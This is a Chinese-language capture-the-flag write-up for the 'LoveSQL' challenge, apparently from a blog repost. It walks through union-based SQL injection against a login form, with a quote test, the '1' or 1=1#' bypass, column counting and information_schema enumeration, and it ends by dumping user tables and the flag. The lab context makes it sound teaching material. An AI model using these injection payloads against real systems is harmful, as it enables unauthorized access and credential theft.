当前位置:网站首页>[极客大挑战 2019]LoveSQL 1
[极客大挑战 2019]LoveSQL 1
2022-07-29 15:53:00 【B_secretary】
测试是否有单引号注入
1'
回显为:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'password'' at line 1
万能钥匙
1' or 1=1#
回显:
Your password is'22ec72d47e489fbbdf39acd7a87f99ac'
测试字段数
admin' order by 4#
回显:
Unknown column '4' in 'order clause'
说明有四个字段,猜测为:id、username、password
测试回显字段
1' union select 1,2,3#
回显:
Hello 2!
Your password is '3'
可以看到2、3有回显,2代表用户名,3为密码
接下来就可以利用2、3的回显进行注入
测试表
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
回显:
Hello 2!
Your password is 'geekuser,l0ve1ysq1'
可以看到有geekuser,l0ve1ysq1两个表
查看表的字段
geekuser表
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#
回显:
Hello 2!
Your password is 'id,username,password'
l0ve1ysq1表
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
回显:
Hello 2!
Your password is 'id,username,password'
查表
geekuser
1' union select 1,2,group_concat(id,username,password) from geekuser#
回显:
Hello 2!
Your password is '1adminef4087e987fdee056a7d7eb6f611d235'
l0ve1ysq1
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
回显:
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{ac289490-df8d-4a2c-a934-e56fbcd2d8c2}'
得到flag
flag{ac289490-df8d-4a2c-a934-e56fbcd2d8c2}
边栏推荐
- flutter如何实现切换页面缓存
- SAP ABAP OData 服务诊断工具 /IWFND/ERROR_LOG 的使用方法试读版
- 一文参透分布式存储系统Ceph的架构设计、集群搭建(手把手)
- win10 校验sha256
- [Server Storage Data Recovery] A data recovery case of a RAID 5 crash caused by the failure of a certain model of Huawei OceanStor storage RAID 5 hard disk and the failure to synchronize data with the
- 易基因:人类tRNA基因位点表现出与衰老相关的DNA高甲基化|研究文章
- 金九银十必备 快来看看你还缺啥
- 边缘计算如何与小程序结合?智能家居如何借势发展?
- 我的 2019 年终总结
- Comparator和Comparable
猜你喜欢

双非渣渣的上岸之路!备战 60 天,三战滴滴侥幸收获 Offer

Talking about the memory layout of the program

中小型金融企业该如何进行灾备建设?

QT连接Mysql数据库(详细成功版)

Comparator和Comparable

MQTT over QUIC:下一代物联网标准协议为消息传输场景注入新动力

蚂蚁三面滑铁卢!遭分布式截胡,靠这些笔记潜修 30 天,挺进京东

#夏日挑战赛# HarmonyOS - 实现签名功能

Twin all things digital visual | join the real world and the digital space

mysql的union和union all
随机推荐
浏览器线程
【软考软件评测师】自动化测试章节上篇
【小程序项目开发-- 京东商城】uni-app之商品列表页面 (上)
MySQL笔记下
mysql的sql分页查询语句怎么写_sql 分页查询语句(mysql分页语句)「建议收藏」
双非渣渣的上岸之路!备战 60 天,三战滴滴侥幸收获 Offer
Recommended Remote Desktop Tools
微信公众号借助小程序云函数实现支付功能
Store Information Management System
中芯国际:禁令后全力自救,设备等待期拉长,但没有客户“离开”
驱动领域DDD的微服务设计和开发实战
风格迁移篇----艺术风格转换的内容与风格解构
专访亚信科技张桦:AntDB面向企业核心业务支撑的数据库产品
718. The longest repeat subarray
易基因:人类tRNA基因位点表现出与衰老相关的DNA高甲基化|研究文章
Jenkins持续集成与自动化部署系统安装配置
如何在C语言中定义自己的数据类型?
Moving forward steadily without forgetting the original intention, Volvo's sense of security comes from the public's recognition
泰芯TXW8301打造新一代8路无线监控NVR套装解决方案
QT连接Mysql数据库(详细成功版)